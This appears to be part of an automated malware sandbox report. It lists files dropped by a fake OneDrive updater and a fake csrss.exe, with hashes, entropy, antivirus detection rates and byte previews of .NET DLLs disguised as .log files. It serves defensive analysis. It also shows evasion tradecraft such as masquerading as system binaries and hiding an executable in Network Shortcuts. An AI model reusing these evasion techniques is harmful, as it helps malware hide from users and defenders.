SHA-256:	1054AF5E9206AA0CB650A4E58900BCD369A554E64EAA89F56CB35CD105386EB5
SHA-512:	6AF6336782B29BDAB906E4D289CB5C2C8500BA8A20DEE53DEF21960E62AFC28EC6756B746B4E4036A30726984A60B656B3D529B4ABC119953267E91BE4992A4D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 76%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.f............................N.... ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc... .... ......................@..@.reloc.......@......................@..B................0.......H.......X....@......v...................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\ef091392c4842d

Download File

Process:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
File Type:	ASCII text, with very long lines (725), with no line terminators
Category:	dropped
Size (bytes):	725
Entropy (8bit):	5.892072700916003
Encrypted:	false
SSDEEP:	12:Q7jJVmhSzUetT9OI9ZQdimPUAsLJRmjPIjielxQMma9xseL02zb0R1Zgts5JDmT8:wjyRenFZQdpUAsLfOPIufMma9WDA0/sW
MD5:	BEB60601E4162F7E8DF1EF3048832BE5
SHA1:	EE37718D2D78B14C82F0F266FF9B2509009B8DF8
SHA-256:	22AFCA2A067AFA4941C744F3BBB2616FC8DD435BFBBA5779C70385EE2B778771
SHA-512:	E143425E28CEC0B43CE9EDE76F955632EDE016FA05DBED5A522DE00798A41382876B6D71746E81DB7E9C79E5CF7AEE74AE2DBF7363D4576BF63B0AF53809BAC5
Malicious:	false
Preview:	EpqLLYGt8MXZ4BMZCB6bO6IY1FUGFTmtS3Q4zFIG7OpRhFCIzvrYrIeHhRTGEAnpjoGAuSk730e9Q01wCLQUlOBKZJXivBC7kAs38BYhKue1oe0qahD3uTDVm6lk5BM1ygZQI7xBwtJ0tKg4SqIN8JNR6WQBZymJhmDHFkictBGBJMlcaqRP393oTITvqwl8GASGHYzsHpd6CMHtvyltgXPitYx6Qwv7aI4I3eVB1iHNf6mHAk92K2btuuXsl2cU4fg4R9zRdk17PCDxwp6pw3xiqKYJHmZ8FwT9aszBusYkAdesqk656whAs8NHkpK1K31csDWE055EeMhMqpdgpeBTPSRcesaEihaHlBAmN2FB1dgfaBb5MnLq1iNZw4jHe0f6wakop0TwYAbvwvBdQe25WuPDxkzTT7gB7jtAawQVUYR1HbnB3G197kkCKh1EAAdadaxMCBCeOhk8cY5V7yZMGhDX9qz25LUU40Xqna92DWva9mjwlfHMkRU6XaMVLJjCMQDlAOsgyhItvmXXGDRaEIungbTNOoq3xsOti8vWxlXCIkKuDyOI2I8EfaFj5fSK1P6DYnzIR4ncurf6QiJZZiBotJNI2MbRSML3nGWZ9F18ffUy4JSWV3vTNRTOZqQFcVJhglSJMtZTrDINzZNt3E6Zb1pWxIATzvfKVwRT0JKldbmKIFYAdgMYYuGp66WDtGe5i82DI42t4U6AP

C:\Users\user\Desktop\11ddf1f96e1556

Download File

Process:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
File Type:	ASCII text, with very long lines (639), with no line terminators
Category:	dropped
Size (bytes):	639
Entropy (8bit):	5.900338988773468
Encrypted:	false
SSDEEP:	12:6yMtqn1audPRhumqXIIJHUuCcqTUbsv9SPGKkQy1E0ZQLVIYz7:Rn1audJhuh0uKIRGg0ZQLVzz7
MD5:	2EA27782A0E77FCFD268766EA40DBD10
SHA1:	D1923219733BCDA01D92BEB8AA2CD3D9929A0949
SHA-256:	C767BC6F7D07C4135FDF4D62A46A4652CB64CD0CF62EC2E92FF77952A1BD1BA4
SHA-512:	EFA78DBCEFA35D9317E1F282077227419A1DB7AB45AC7A61D20B9FB5AD39F2B27EBB8F88357BDD107C2CF42E940B7A360B99A00B4E72792C1F7833AC7AEA5602
Malicious:	false
Preview:	03lfQ5jXijOajdNeezgn0WCcsVCHFmOFYkAp6i2Y3psmC5Uww8tJ2Rwd0Jx52bR5UIC8cii56HuKoZZxAQVH3EMGxhyxv7fcYwR32VUNaxMvhlyat94mGKBP55L5uvK9mSw2Ig4p5HqG1bjLsXEwC2VOuB77KYcpnNIPz6SMEPr9d5YeW9NXqY6u6iHGi7egoBcnTUWvE1rxLWuzndlKLF8PRYSRzMnHuKUbduKBnbSzqIijxScFWTVjDNW4BF62NkCBCSW3SjhuwIiJzsdgtiuazvYPXQAifalGFhhf6jxxwkw4oNFSmZIpzlMQ3GfCi8PVgcDRL7kJu7oO8elKLs6FS6RdVQl0EvOxVbXMJxHoz84177SZfU00CJDkKj64WuF9s03hGYAYlSQTCZgY8MUt4YvLXxBk1NSF24IGEuSGTcPu3tivDi5JZWFUFrJTXahXAKbHQZTN3OZbJARoPQhSRIqfzyAWk9t351utSaenOrQK7nKFZfEG3OG1e5SbZ6m4ffgSQiVyv3Ej1fiLn57F4m9ru2OXICORFVpbH2z0KQU9JgA8XGxd9h92gyhXU8pspxeg0GDvGG4oRAhN2PABOuShWx5TVbgMkmTWCeIQDCX2mVkfQTeE7nd5e7J

C:\Users\user\Desktop\APmXeiLI.log

Download File

Process:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\AVoOdXhS.log

Download File

Process:	C:\Users\Public\Documents\csrss.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\BSPWzXwN.log

Download File

Process:	C:\Users\Public\Documents\csrss.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.645950918301459
Encrypted:	false
SSDEEP:	384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
MD5:	E84DCD8370FAC91DE71DEF8DCF09BFEC
SHA1:	2E73453750A36FD3611D5007BBB26A39DDF5F190
SHA-256:	DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
SHA-512:	77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\CUnYbBNA.log

Download File

Process:	C:\Users\Public\Documents\csrss.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\EERPqGGD.log

Download File

Process:	C:\Users\Public\Documents\csrss.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	5.0168086460579095
Encrypted:	false
SSDEEP:	96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
MD5:	69546E20149FE5633BCBA413DC3DC964
SHA1:	29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
SHA-256:	B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
SHA-512:	90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................V...}..................0..C.......(....o.......(....(....o.......(....s......(...........o....o.......0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..

C:\Users\user\Desktop\GKdPiyNu.log

Download File

Process:	C:\Users\Public\Documents\csrss.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\GVFPWxSW.log

Download File

Process:	C:\Users\Public\Documents\csrss.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\HsjPOZbA.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\IzKxwscH.log

Download File

Process:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\JDsxUuzs.log

Download File

Process:	C:\Users\Public\Documents\csrss.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\JOMOLeeW.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	5.0168086460579095
Encrypted:	false
SSDEEP:	96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
MD5:	69546E20149FE5633BCBA413DC3DC964
SHA1:	29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
SHA-256:	B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
SHA-512:	90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................V...}..................0..C.......(....o.......(....(....o.......(....s......(...........o....o.......0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..

C:\Users\user\Desktop\LAjmiABv.log

Download File

Process:	C:\Users\Public\Documents\csrss.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\LpAoDpdA.log

Download File

Process:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\NIROLNIi.log

Download File

Process:	C:\Users\Public\Documents\csrss.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	5.0168086460579095
Encrypted:	false
SSDEEP:	96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
MD5:	69546E20149FE5633BCBA413DC3DC964
SHA1:	29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
SHA-256:	B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
SHA-512:	90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................V...}..................0..C.......(....o.......(....(....o.......(....s......(...........o....o.......0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..

C:\Users\user\Desktop\NsnWYYhw.log

Download File

Process:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\OnkfajLl.log

Download File

Process:	C:\Users\Public\Documents\csrss.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.645950918301459
Encrypted:	false
SSDEEP:	384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
MD5:	E84DCD8370FAC91DE71DEF8DCF09BFEC
SHA1:	2E73453750A36FD3611D5007BBB26A39DDF5F190
